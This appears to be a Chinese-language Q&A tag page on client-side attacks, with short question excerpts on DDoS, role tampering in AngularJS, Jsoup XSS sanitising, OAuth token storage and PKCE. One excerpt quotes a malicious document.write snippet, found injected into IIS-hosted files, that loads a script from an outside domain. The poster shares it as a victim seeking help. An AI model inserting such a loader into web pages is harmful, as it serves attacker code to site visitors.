client-side-attacks

    2熱度

    1回答

    我想託管一臺Web服務器,但我的方式存在一些問題:DDoS攻擊。我對託管一臺Web服務器很陌生,最近我剛剛發現了它們。我可能是錯的,但我知道當機器人向服務器發送請求時,他們不會向服務器返回答案,所以服務器會嘗試一次又一次地發送機器人想要的文件。有沒有辦法讓服務器返回文件5次,如果客戶端「doesent獲取」該文件,第6次服務器doesent再次返回文件到該客戶端? 我很抱歉,如果問題或標題有點混亂

    0熱度

    1回答

    我們有angularjs應用,我們有相關的用戶不同的角色調試代碼在JavaScript。例如:這兩個角色是管理員和本地。根據角色,我們爲管理員顯示一些菜單項,並向管理員添加更多功能/屏幕。 與管理屬性的用戶信息從登錄響應中返回,並根據我們的決定,所有的菜單和屏幕來呈現。 但是,如果我們的用戶開發工具,在使用管理員屬性設置斷點,並設置管理員屬性爲true的用戶即使他是本地用戶將能夠訪問管理員權限。

    1熱度

    1回答

    我想使用Jsoup在我的Java應用程序中從XSS攻擊中清除一些HTML字符串。 但我想也有<a>和<img>標籤。 這個庫可以嗎?

    2熱度

    1回答

    我生成oauth2訪問並刷新令牌並將它們存儲在我的數據庫中。我使用UUID v4生成這些令牌並刪除破折號。我曾經在過期後刪除令牌,但現在我將它們全部存儲起來,因爲我想到了可能發生的事情。 如果攻擊者在本地存儲了爲其生成的所有訪問令牌並且他一再使用這些訪問令牌進行授權,該怎麼辦?由於我作爲數據庫管理員正在刪除生成的令牌,因此數據庫無法知道令牌是否唯一。因此,如果UUIDv4算法生成一個不同的用戶的訪

    0熱度

    1回答

    我在我的IIS服務器中有很多javascript和html文件。幾天前,一些奇怪的代碼注入到文件中。下面的代碼。 /*ec8243*/ document.write('<script type="text/javascript" src="http://brilleandmore.de/cgi-bin/cnt.php?id=5655549"></script>'); /*/ec8243*/

    0熱度

    1回答

    我正在通過auth 2.0協議[1],以及證明密鑰RFC [2]。它很好地解釋了協議如何防止惡意應用程序監聽網絡流量。但是,我無法理解auth 2.0協議如何防止惡意代碼在瀏覽器本身上工作。 我們來看一個簡單的證明密鑰RFC協議的例子。我們生成一個高熵代碼驗證器,但我們必須將它存儲在瀏覽器的某個地方(可能在cookie /瀏覽器的本地存儲器中),以便再次使用它來獲取令牌。現在,如果在瀏覽器上執行惡